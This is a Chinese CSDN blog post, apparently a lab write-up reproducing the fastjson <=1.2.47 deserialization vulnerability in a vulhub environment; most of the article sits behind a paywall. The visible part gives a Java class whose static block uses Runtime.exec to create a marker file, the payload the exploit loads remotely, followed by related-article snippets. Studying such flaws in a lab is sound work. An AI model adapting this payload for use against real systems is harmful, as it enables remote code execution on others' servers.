fastjson<=1.2.47反序列化漏洞复现

最新推荐文章于 2024-07-21 21:53:52 发布
最新推荐文章于 2024-07-21 21:53:52 发布
阅读量436 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wendy_lwn/article/details/108798157
版权
本文介绍了如何复现fastjson<=1.2.47的安全漏洞。首先通过vulhub搭建环境,然后创建并编译TouchFile.java,将其部署在Tomcat服务器上。接着,利用marshalsec启动RMI服务,并构造特定payload向目标主机发送请求,最终成功触发漏洞,实现文件操作和反弹Shell。
摘要由CSDN通过智能技术生成

fastjson<=1.2.47 反序列化漏洞复现

环境搭建

使用vulhub进行环境搭建,具体步骤可参考这里

本文中环境IP地址介绍:
攻击IP:192.168.120.1
目标IP:192.168.120.161

漏洞复现

创建一个java类:
TouchFile.java

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/successFJ"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

编译上面创建的java类:

javac TouchFile.java

编译后同目录下回出现TouchFile.class文件

在这里插入图片描述

最低0.47元/天 解锁文章
DaWan_Lv
关注
专栏目录
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3404
Fastjson 1.2.47反序列化漏洞复现
Fastjson=1.2.47反序列化漏洞复现
m0_48520508的博客
07-28 932
0x01简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 FastJson特点如下: (1)能够支持将java bean序列化成JSON字符串,也能够将JSON字符串反序列化成Java bean。 (2)顾名思义,FastJson操作JSON的速度是非常快的。 (3)无其他包的依赖。 (4)使用比较方便。 0x02漏洞介绍 Fastjson提供了aut
Fastjson = 1.2.47 反序列化漏洞复现
qq_32660043的博客
08-23 439
0x01 前言 Fastjson 是一个 Java 语言编写的高性能功能完善的 JSON 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,在中国和美国使用较为广泛。 0x02 漏洞成因 Fastjson < 1.2.68 版本在处理反序列化对象时存在安全问题,导致攻击者可以执行 java 代码,具体分析可参考:FastJson 反序列化学习 0x03 环境准备 docker 搜索 Fastjson 漏洞利用镜像: docker search fas
fastjson1.2.24 反序列化漏洞复现
最新发布
RMC131的博客
07-21 886
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。这里json与java对象之间的转换,便是使用的序列化和反序列化fastjson反序列化也就是来自这里。详细介绍:https://www.runoob.com/w3cnote/fastjson-intro.html。
fastjson反序列化漏洞fastjson-1.2.47
zyer
04-28 4078
fastjson 1.2.47 爆出了最为严重的漏洞,可以在不开启 AutoTypeSupport 的情况下进行反序列化的利用。 一.原理 测试代码Test.java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; public class Test { public static void main(String[] args) { String s2 =...
Fastjson1.2.47反序列化漏洞复现
thelostworld
05-12 592
一、漏洞描述Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意
张小白的实验室Fastjson1.2.47反序列化漏洞复现
Litbai_zhang
07-10 797
实验环境 攻击机C:Windows 10 企业版 LTSC 靶机A:CentOS8 (公网) 监听主机B:Centos7(公网) 项目地址: https://github.com/vulhub/vulhub 该篇复现环境是fastjson1.2.47复现手法同时适用于fastjson1.2.24,payload已在下文提供 基础环境搭建 在靶机A上安装docker curl https://download.docker.com/linux/centos/docker...
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6370
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
FastJson反序列化漏洞复现附带多个版本的payload
qq_41187177的博客
09-03 4303
FastJson<=1.2.68版本反序列化漏洞复现1.漏洞环境搭建2.攻击环境搭建3.攻击步骤4.各个Fastjson版本的payload3.漏洞解析 1.漏洞环境搭建 打开IDEA,新建一个java web的项目 修改HelloServlet.java文件输入一下代码import java.io.*; import javax.servlet.http.*; import javax.servlet.annotation.*; import com.alibaba.fastjson.*; @W
Fastjson 1.2.47 反序列化(CVE-2017-18349)漏洞复现
HEAVEN569的博客
06-21 1648
Fastjson 1.2.47 反序列化(CVE-2017-18349)漏洞复现
(环境搭建+复现Fastjson1.2.47版本反序列化漏洞复现
热门推荐
daxi0ng的博客
11-13 1万+
0x00 简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。 0x01 漏洞概述 Fastjson1.2.47反序列化漏洞 首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型...
菜鸡一枚(勿喷)复现Fastjson「=1.2.47反序列化漏洞
S_yd1的博客
07-09 634
0x00 前言 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。对版本小于1.2.48的版本通杀,autoType为关闭状态也可使用。 loadClass中默认cache设置为true,利用分为2步执行,首先使用java.lang.Class把获取到的类缓存到mapping中,然后直接从缓存中获取到了com.sun.rowset.JdbcRowSetImpl
【网络安全】Fastjson反序列化漏洞复现
kali_Ma的博客
12-26 2709
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
fastjson反序列化漏洞(1.2.47-rce)
siu~
10-18 561
FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2742
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。
fastjson反序列化漏洞复现
weixin_58954236的博客
09-11 1343
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。​ 关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。
Fastjson反序列化漏洞复现(实战案例)
qq_50854662的博客
08-23 1775
Fastjson反序列化漏洞复现(实战案例)
fastjson1.2.47反序列化漏洞复现
whojoe的博客
05-22 1510
fastjson1.2.47反序列化漏洞复现环境搭建启动docker下载环境生成docker环境漏洞检测区分 Fastjson 和 Jackson漏洞复现kali下切换java版本maven编译kali监听测试外联编译Exploit.java准备LDAP服务和Web服务监听shell发送数据包参考文章 环境搭建 启动docker systemctl start docker 下载环境 git clone https://github.com/vulhub/vulhub.git 生成docker环境 cd
fastjson反序列化漏洞复现过程
04-19
- Fastjson<=1.2.47远程代码执行漏洞(CNVD-2019-22238):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中使用特殊的反射调用方式来执行恶意代码。 3. 防范措施:为了防止...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值